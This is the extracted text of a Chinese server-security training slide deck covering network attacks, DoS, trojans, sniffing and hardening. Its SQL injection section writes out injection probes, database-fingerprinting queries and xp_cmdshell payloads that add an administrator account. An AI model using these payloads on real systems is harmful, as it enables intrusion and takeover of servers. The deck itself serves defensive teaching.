服务器安全防范体系.ppt
《服务器安全防范体系.ppt》由会员分享,可在线阅读,更多相关《服务器安全防范体系.ppt(224页珍藏版)》请在三一文库上搜索。
1、服务器安全防范体系,2011年11月,2019年2月20日,服务器安全培训索引,Pages:2,培训目录,第一讲:安全基础知识 第二讲:服务器安全规范 第三讲:操作系统安全 第四讲:常见应用安全 第五讲:操作实践,2019年2月20日,服务器安全培训索引,Pages:3,安全基础知识主要内容(1),信息安全的概念 安全问题产生的根源 安全漏洞的威胁 常见的攻击方式 扫描:扫描目的、使用工具获取信息 网络监听:监听原理与作用 拒绝服务:Syn Flood、udp Flood、Icmp Flood 木马:木马的概念、入侵途径、隐藏方式、特洛依木马简介 SQL注入:讲解SQL注入的思路与过程,防范S
2、QL注入的方法,2019年2月20日,服务器安全培训索引,Pages:4,安全基础知识主要内容(2),主要安全技术 防火墙技术简介: 包过滤、应用层网关、状态检测、优缺点 入侵检测技术简介 主机入侵检测、网络入侵检测 扫描技术简介 扫描器分类、工作原理、端口扫描,2019年2月20日,服务器安全培训索引,Pages:5,服务器安全规范主要内容(1),服务器维护安全规范 口令安全 访问控制 安全责任的划分 安全检查 服务器上禁止操作行为 系统日志管理 安全隐患通告 系统安全设置的问题 补丁管理流程 Autoup/Octopod简介、对比 补丁的下载、测试、上传、分发过程 补丁光盘的制作,2019
3、年2月20日,服务器安全培训索引,Pages:6,服务器安全规范主要内容(2),目前采取的安全措施简介 日常监控、补丁管理、访问控制 主机安全配置、安全检查 漏洞扫描、漏洞跟踪与分析、安全通告 安全控管(octopod)、HIDS、防病毒 备份、日志集中 典型安全事件 介绍两个公司发生过的安全事件,2019年2月20日,服务器安全培训索引,Pages:7,操作系统安全主要内容(1),Windows系统安全 Windows安全特性 内建帐号,内建组、SAM 、SID NTFS、用户权利、权限、共享权限 Windows系统服务与进程、日志系统 Windows安装配置过程(介绍安全原则性的内容),2
4、019年2月20日,服务器安全培训索引,Pages:8,操作系统安全主要内容(2),Linux系统安全 Linux帐号安全、口令安全 用户与UID、用户组与GID 文件类型、文件的权限 加强Linux安全的几点建议 关闭不必要的服务、远程维护openssh 启用syslog、升级主要应用 查看登录情况、网络连接、进程、系统资源 iptables策略,2019年2月20日,服务器安全培训索引,Pages:9,常见应用安全主要内容(1),Web安全(IIS) 概述、漏洞、IIS组件的安装 IIS安全加固 删除:默认站点、示例文件、默认脚本、无用脚本映射 IIS工作目录修改、启用web日志、更改日志
5、路径 Web站点权限设置、http 500错误重定向 禁用WebDav、启用ipsec保护,2019年2月20日,服务器安全培训索引,Pages:10,常见应用安全主要内容(2),数据库安全(SQL Server 2000) 补丁管理 新装数据库服务器的补丁要求 老数据库服务器的补丁要求 口令策略 数据库日志 去除部分危险扩展存储过程 数据库的端口保护,2019年2月20日,服务器安全培训索引,Pages:11,操作实践主要内容,讲解、演示以下内容: 服务器安全配置过程(依据服务器安全规范要求) 更改、删除帐号 启用安全日志 网络安全设置 Winchk/autoup配置安装 Octopod功能
6、介绍、基本操作 NetView功能介绍、基本操作 Syslog与Hids初始化操作 在命令行下配置IPSEC,安全基础知识,网络安全部 2008年11月,2019年2月20日,安全基础知识,主要内容,信息安全的概念 安全问题产生的根源 安全漏洞的威胁 常见的攻击方式 主要的安全技术,2019年2月20日,安全基础知识,信息安全概念,信息安全的含义 保证信息内容在传储、传输和处理各环节的机密性、完整性和可用性 对信息的传播及内容具有控制能力 不受偶然的或者恶意的原因而遭到破坏、更改、泄露 保证信息系统连续可靠的运行 网络服务不中断,2019年2月20日,安全基础知识,安全问题产生的根源,网络建设
7、之初忽略了安全问题 TCP/IP协议本身缺乏安全性 操作系统及应用自身存在的漏洞 操作系统及应用不安全的配置 来自内网用户的安全威胁 缺乏有效的手段监视、评估网络的安全性 邮件病毒、Web页面中中恶意Java/ActiveX控件 代码中存在安全漏洞 管理中存在的安全问题,2019年2月20日,安全基础知识,安全漏洞,漏洞的概念 在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,可以使攻击者在未授权的情况下访问或破坏系统 可能存在于 网络设备:交换机、路由器的IOS存在的漏洞、配置错误 操作系统:Windows、Unix/Linux存在的漏洞 应用服务:IIS、Apache、Serv_u存
8、在的漏洞 网络协议:TCP/IP存在的缺陷 应用程序:用C、C+、ASP、PHP代码中 ,2019年2月20日,安全基础知识,漏洞带来的威胁,如果攻击者获得了一般用户的访问权限,那他就很有可能再通过利用本地漏洞把自己提升为管理员权限:,远程管理员权限 本地管理员权限 普通用户访问权限 权限提升 读取受限文件 远程拒绝服务,本地拒绝服务 远程非授权文件存取 口令恢复 欺骗 服务器信息泄露 其它,2019年2月20日,安全基础知识,黑客攻击典型步骤,漏洞分析,实施攻击 exploit,消除证据 留下后门,收集信息 扫描,2019年2月20日,安全基础知识,常见的攻击方式,扫描 网络监听 DoS与D
9、DoS攻击 特洛依木马 SQL 注入,2019年2月20日,安全基础知识,通过扫描获取信息,收集目标服务器的信息 开放的端口和应用 操作系统类型 用户帐号信息 系统的漏洞 应用的漏洞 ,2019年2月20日,安全基础知识,网络监听,监听的目的是截获通信的内容 监听的手段是对协议进行分析 常用的工具 Sniffer pro、Wireshark都是网络监听、协议分析的工具。 Tcpdump 在共享网络中,可以监听所有流量 在交换环境中,必须设置端口镜像 通过协议分析,可获取敏感的明文信息 Telnet、smtp、pop3、ftp、http等应用层协议都是明文传输,2019年2月20日,安全基础知识
10、,共享和交换环境下的监听,共享式网络 通过网络的所有数据包发往每一个主机 通过HUB连接起来的子网 可以直接监听 交换式网络 通过交换机连接网络 由交换机构造一个“MAC地址-端口”映射表 发送包的时候,只发到特定的端口上 可以通过配置“端口镜像”来实现监听,2019年2月20日,安全基础知识,利用监听获取邮件密码,截获用户邮件口令,2019年2月20日,安全基础知识,冒险岛抓包分析案例,设置抓包服务器 配置端口镜像 7x24小时抓包 进行协议分析 判断攻击类型,2019年2月20日,安全基础知识,拒绝服务DoS,定义 通过某些手段使得目标系统或者网络不能提供正常的服务 是针对可用性发起的攻击
11、 原理 主要是利用了TCP/IP协议中存在的设计缺陷、操作系统或网络设备的网络协议栈存在的缺陷 特点 难于防范,2019年2月20日,安全基础知识,拒绝服务的形式,资源耗尽和资源过载 网络连接 带宽资源 其他资源,例如:磁盘空间被日志撑满 错误的配置 不当的配置造成某些服务无法访问 物理部件故障,2019年2月20日,安全基础知识,拒绝服务攻击分类,拒绝服务攻击 Syn Flood Udp Flood Icmp Flood Ping of death Teardrop Smurf Land 主要介绍Syn flood、UDP Flood、ICMP Flood攻击,2019年2月20日,安全基础
12、知识,Syn Flood攻击(1),TCP协议 提供可靠的连接服务,采用三次握手建立一个TCP连接 TCP连接三次握手过程,SYN,SYN +ACK,ACK,Client,Server,SYN_SEND,SYN_RECV,ESTABLISHED,ESTABLISHED,2019年2月20日,安全基础知识,SYN Flood攻击(2),原理: 利用TCP协议缺陷发送大量TCP半连接请求,使得目标机器不能进一步接受TCP连接 对TCP而言,半连接是指一个没有完成三次握手过程的会话 配合IP欺骗,短时间内不断发送SYN包,使服务器回复SYN/ACK,并不断重发直至超时 伪造的SYN包长时间占用未连接
13、队列,达到上限后,服务器将拒绝响应SYN请求,正常的SYN请求被丢弃,2019年2月20日,安全基础知识,SYN Flood攻击(3),攻击者 172.18.1.1,目标 192.0.2.1,欺骗性的 IP 包 源地址是伪造的 目标地址是 192.0.2.1 TCP Open,SYN,2019年2月20日,安全基础知识,SYN Flood攻击(4),攻击者 172.18.1.1,目标 192.0.2.1,SYN+ACK,同步应答响应 源地址 192.0.2.1 目标地址不存在 TCP ACK,2019年2月20日,安全基础知识,SYN Flood攻击案例,外高桥机房下载系统DLC服务器61.1
14、52.103.129遭到Syn-Flood攻击,2019年2月20日,安全基础知识,UDP Flood攻击,原理: UDP协议是无连接的协议,提供不可靠的传输服务 不需要用任何程序建立连接来传输数据 攻击者向目标机端口发送了足够多的 UDP 数据包的时候,整个系统就会瘫痪。 使用目标机忙于处理UDP报文,无法处理其它的正常报文,从而形成拒绝服务,2019年2月20日,安全基础知识,ICMP Flood,原理 利用ping对网络进行诊断,发出ICMP 响应请求报文 计算机收到ICMP echo后会回应一个ICMP echo reply报文 攻击者向目标机发送大量的ICMP echo报文 目标机忙
15、于处理这些报文,无法处理其它网络报文,从而形成拒绝服务,2019年2月20日,安全基础知识,UDP Flood攻击案例,冒险岛三区服务器受到DDOS攻击事件 异常:发现大量发往UDP 8585端器的UDP包 影响:端口流出流量95.29M 上层交换机上联端口流量639.27M 处理方法:在6509上配置ACL过滤攻击报文,2019年2月20日,安全基础知识,DDOS攻击介绍(1),分布式拒绝服务(DDOS) Distributed Denial of Service 传统的拒绝服务是一台机器向受害者发起攻击 DDOS攻击是多台主机合作,同时向一个目标发起攻击,2019年2月20日,安全基础知识
16、,DDOS攻击介绍(2),主控端,代理端,2019年2月20日,安全基础知识,模拟试题1,下面哪项不是Syn flood攻击的特征? A 网络流量异常增大 B 服务器80端口建立了大量的TCP连接 C 服务器收到大量的SYN请求 D 未连接队列超过上限,2019年2月20日,安全基础知识,特洛依木马,木马的由来 古希腊人围攻特洛伊城时使用的木马计 计算机中的特洛伊木马的名字就是由此得来 定义 隐藏在正常程序中的一段具有特殊功能的程序,其隐蔽性极好,不易察觉,是一种极为危险的网络攻击手段 木马的组成 server端:安装在目标机器上的软件 client端:用于控制目标机器的软件,2019年2月2
17、0日,安全基础知识,木马入侵的途径,捆绑欺骗 如把木马服务端和某个游戏捆绑成一个文件后中发给别人 危险下载点 攻破下载站点后,下载几个下载量大的软件,捆绑上木马,再悄悄放回去让别人下载 ; 直接将木马改名上载到FTP网站上,等待别人下载 网站挂马 在网站的网页中植入木马或插入下载木马的连接 主要是利用IE浏览器的漏洞 利用系统漏洞入侵后安装木马,2019年2月20日,安全基础知识,木马的特征,隐蔽性 包含在正常程序中,当用户执行正常程序启动 在用户难以察觉的情况下,完成一些危害用户的操作 没有图标,在任务管理器中隐藏 自动运行 增加一个服务 注册表启动项run 功能的特殊性 除了文件操作、设置
18、口令、进行键盘记录、远程注册表操作 上传、下载以及锁定鼠标等功能,2019年2月20日,安全基础知识,木马的隐藏方式,隐藏进程、端口 隐藏文件、目录 被控端反向连接控制端 端口复用 有些木马在使用80HTTP端口后,收到正常的HTTP请求仍然把它交给Web服务器处理,只有收到一些特殊约定的数据包后,才调用木马程序 隐身技术 采用替代系统功能的方法(改写vxd或DLL文件),木马会将修改后的DLL替换系统已知的DLL,并对所有的函数调用进行过滤 文件加壳 通过加壳隐藏特征,躲避杀毒软件的查杀,2019年2月20日,安全基础知识,典型木马-灰鸽子,灰鸽子是国内著名的木马 远程控制、文件操作 运用
19、“反弹端口”突破防火墙 服务端上线通知 远程音频通讯,音视频监控,2019年2月20日,安全基础知识,风云项目服务器中木马案例,HIDS监测到异常文件 病毒或木马 2008-03-16 01:16:10 999021372 220.166.63.5 192.168.1.5 感染文件=/?/C:/WINDOWS/LocalService.exe 风云测试区测试组loginserver 使用杀毒软件扫描 文件加壳 木马以webclient服务启动,2019年2月20日,安全基础知识,SQL注入,利用SQL的语法,针对的是应用程序开发设计中的漏洞 当攻击者能够操作数据,往应用程序中插入一些SQL语句
20、时,SQL注入就发生了 攻击目标:控制服务器/获取敏感数据,2019年2月20日,安全基础知识,SQL 注入的步骤,判断SQL注入漏洞 查找SQL注入点 判断后台数据库类型 确定XP_CMDSHELL可执行情况 获得后台管理的权限,2019年2月20日,安全基础知识,判断SQL注入漏洞,语句 http:/ select * from 表名 where 字段=49(list.asp运行异常) 返回 Microsoft OLE DB Provider for SQL Server 错误 80040e14 字符串 Order By Id DESC 之前有未闭合的引号。 /list.asp,行290
21、获取信息 初步确定可能存在SQL INJECTION漏洞,2019年2月20日,安全基础知识,查找注入点(1),测试方法 http:/ http:/ and 1=1 http:/ and 1=2 经典的1=1 ,1=2测试法 可以注入 正常显示(必然结果) 正常显示,内容基本与相同 提示错误,2019年2月20日,安全基础知识,查找注入点(2),使用工扫描注入点,2019年2月20日,安全基础知识,判断数据库类型,语句 http:/ and 0(select version) 返回 Microsoft OLE DB Provider for SQL Server 错误 80040e07 将 n
22、varchar 值 Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) 转换为数据类型为 int 的列时发生语法错误。 /list.asp,行290 判断 从MS SQL SERVER 后面的8.00.760可看出打了SP3,2019年2月20日,安全基础知识,查询连接DB的权限,语句 ht
23、tp:/ and 0(select user_name() 返回 Microsoft OLE DB Provider for SQL Server 错误 80040e07 将 nvarchar 值 dbo 转换为数据类型为 int 的列时发生语法错误。 /list.asp,行290 判断 权限很高,可以确定是服务器角色组中的成员,2019年2月20日,安全基础知识,执行XP_CMDSHELL,条件 当前连接数据的帐号具有SA权限 master.dbo.xp_cmdshell扩展存储过程能够正确执行 语句 HTTP:/xxx.xxx.xxx/list.asp?id=49;exec masterx
24、p_cmdshell “net user aaa bbb /add”- HTTP:/xxx.xxx.xxx/list.asp?id=49; exec masterxp_cmdshell “net localgroup aaa administrators /add”- 结果 在操作系统中添加帐户aaa,密码为bbb 将新建的帐户aaa加入管理员组,2019年2月20日,安全基础知识,获得web后台管理的权限,后台管理的认证页面一般有以下语句: select * from admin where username=XXX and password=YYY 绕过登录认证 语句变形为 select
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 服务器 安全 防范 体系
链接地址:https://www.31doc.com/p-2134944.html